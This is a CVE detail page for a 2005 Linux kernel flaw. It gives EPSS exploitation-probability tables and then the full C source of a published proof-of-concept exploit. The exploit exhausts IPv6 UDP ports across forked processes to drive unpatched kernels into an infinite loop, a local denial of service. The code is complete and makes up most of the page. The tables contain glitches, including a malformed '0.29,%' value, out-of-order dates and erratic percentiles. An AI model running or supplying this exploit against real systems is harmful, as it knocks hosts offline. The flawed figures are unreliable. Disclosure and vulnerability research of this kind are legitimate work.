CVE-2005-2973 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.01%	–	–
2022-03-27	–	–	4.01%	–	–
2022-04-03	–	–	4.01%	–	–
2022-10-23	–	–	4.01%	–	–
2023-01-01	–	–	4.01%	–	–
2023-01-29	–	–	4.01%	–	–
2023-03-12	–	–	–	0.05%	–
2024-02-11	–	–	–	0.05%	–
2024-02-25	–	–	–	0.05%	–
2024-03-31	–	–	–	0.05%	–
2024-04-21	–	–	–	0.05%	–
2024-06-02	–	–	–	0.05%	–
2024-07-28	–	–	–	0.05%	–
2024-08-04	–	–	–	0.05%	–
2024-08-11	–	–	–	0.05%	–
2024-11-24	–	–	–	0.05%	–
2025-02-16	–	–	–	0.05%	–
2025-01-19	–	–	–	0.05%	–
2025-02-16	–	–	–	0.05%	–
2025-03-18	–	–	–	–	0.29%
2025-03-30	–	–	–	–	0.29%
2025-04-06	–	–	–	–	0.29%
2025-04-15	–	–	–	–	0.29%
2025-04-15	–	–	–	–	0.29,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	68%
2022-03-27	69%
2022-04-03	85%
2022-10-23	86%
2023-01-01	85%
2023-01-29	86%
2023-03-12	13%
2024-02-11	12%
2024-02-25	13%
2024-03-31	14%
2024-04-21	14%
2024-06-02	16%
2024-07-28	17%
2024-08-04	16%
2024-08-11	17%
2024-11-24	18%
2025-02-16	19%
2025-01-19	18%
2025-02-16	19%
2025-03-18	5%
2025-03-30	49%
2025-04-06	5%
2025-04-15	52%
2025-04-15	52%

/* source: https://www.securityfocus.com/bid/15156/info Linux Kernel is reported prone to a local denial-of-service vulnerability. This issue arises from an infinite loop when binding IPv6 UDP ports. */ /* * Linux kernel * IPv6 UDP port selection infinite loop * local denial of service vulnerability * proof of concept code * version 1.0 (Oct 29 2005) * CVE ID: CAN-2005-2973 * * by Remi Denis-Courmont < exploit at simphalempin dot com > * http://www.simphalempin.com/dev/ * * Vulnerable: * - Linux < 2.6.14 with IPv6 * * Not vulnerable: * - Linux >= 2.6.14 * - Linux without IPv6 * * Fix: * http://www.kernel.org/git/?p=linux/kernel/git/torvalds/linux-2.6.git; * a=commit;h=87bf9c97b4b3af8dec7b2b79cdfe7bfc0a0a03b2 */ /***************************************************************************** * Copyright (C) 2005 Remi Denis-Courmont. All rights reserved. * * * * Redistribution and use in source and binary forms, with or without * * modification, are permitted provided that the following conditions * * are met: * * 1. Redistributions of source code must retain the above copyright notice, * * this list of conditions and the following disclaimer. * * 2. Redistribution in binary form must reproduce the above copyright * * notice, this list of conditions and the following disclaimer in the * * documentation and/or other materials provided with the distribution. * * * * The author's liability shall not be incurred as a result of loss of due * * the total or partial failure to fulfill anyone's obligations and direct * * or consequential loss due to the software's use or performance. * * * * The current situation as regards scientific and technical know-how at the * * time when this software was distributed did not enable all possible uses * * to be tested and verified, nor for the presence of any or all faults to * * be detected. In this respect, people's attention is drawn to the risks * * associated with loading, using, modifying and/or developing and * * reproducing this software. * * The user shall be responsible for verifying, by any or all means, the * * software's suitability for its requirements, its due and proper * * functioning, and for ensuring that it shall not cause damage to either * * persons or property. * * * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR * * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES * * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. * * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, * * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF * * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * * * The author does not either expressly or tacitly warrant that this * * software does not infringe any or all third party intellectual right * * relating to a patent, software or to any or all other property right. * * Moreover, the author shall not hold someone harmless against any or all * * proceedings for infringement that may be instituted in respect of the * * use, modification and redistrbution of this software. * *****************************************************************************/ #include <stdio.h> #include <string.h> #include <stdlib.h> #include <errno.h> #include <sys/time.h> #include <sys/types.h> #include <sys/wait.h> #include <sys/resource.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> static int bind_udpv6_port (uint16_t port) { int fd; fd = socket (AF_INET6, SOCK_DGRAM, IPPROTO_UDP); if (fd != -1) { struct sockaddr_in6 addr; int val = 1; setsockopt (fd, SOL_SOCKET, SO_REUSEADDR, &val, sizeof (val)); memset (&addr, 0, sizeof (addr)); addr.sin6_family = AF_INET6; addr.sin6_port = htons (port); if (bind (fd, (struct sockaddr *)&addr, sizeof (addr)) == 0) return fd; close (fd); } return -1; } static int get_fd_limit (void) { struct rlimit lim; getrlimit (RLIMIT_NOFILE, &lim); lim.rlim_cur = lim.rlim_max; setrlimit (RLIMIT_NOFILE, &lim); return (int)lim.rlim_max; } static void get_port_range (uint16_t *range) { FILE *stream; /* conservative defaults */ range[0] = 1024; range[1] = 65535; stream = fopen ("/proc/sys/net/ipv4/ip_local_port_range", "r"); if (stream != NULL) { unsigned i[2]; if ((fscanf (stream, "%u %u", i, i + 1) == 2) && (i[0] <= i[1]) && (i[1] < 65535)) { range[0] = (uint16_t)i[0]; range[1] = (uint16_t)i[1]; } fclose (stream); } } /* The criticial is fairly simple to raise : the infinite loop occurs when * calling bind with no speficied port number (ie zero), if and only if the * IPv6 stack cannot find any free UDP port within the local port range * (normally 32768-61000). Because this requires times more sockets than what * a process normally can open at a given time, we have to spawn several * processes. Then, the simplest way to trigger the crash condition consists * of opening up kernel-allocated UDP ports until it crashes, but that is * fairly slow (because allocation are stored in small a hash table of lists, * that are checked at each allocation). A much faster scheme involves getting * the local port range from /proc, allocating one by one, and only then, ask * for automatic (any/zero) port allocation. */ static int proof (void) { int lim, val = 2; pid_t pid, ppid; uint16_t range[2], port; lim = get_fd_limit (); if (lim <= 3) return -2; get_port_range (range); port = range[0]; ppid = getpid (); puts ("Stage 1..."); do { switch (pid = fork ()) { case 0: for (val = 3; val < lim; val++) close (val); do { if (bind_udpv6_port (port) >= 0) { if (port) port++; } else if (port && (errno == EADDRINUSE)) port++; /* skip already used port */ else if (errno != EMFILE) /* EAFNOSUPPORT -> no IPv6 stack */ /* EADDRINUSE -> not vulnerable */ exit (1); if (port > range[1]) { puts ("Stage 2... should crash quickly"); port = 0; } } while (errno != EMFILE); break; /* EMFILE: spawn new process */ case -1: exit (2); default: wait (&val); if (ppid != getpid ()) exit (WIFEXITED (val) ? WEXITSTATUS (val) : 2); } } while (pid == 0); puts ("System not vulnerable"); return -val; } int main (int argc, char *argv[]) { setvbuf (stdout, NULL, _IONBF, 0); puts ("Linux kernel IPv6 UDP port infinite loop vulnerability\n" "proof of concept code\n" "Copyright (C) 2005 Remi Denis-Courmont " "<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70" "\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n"); return -proof (); }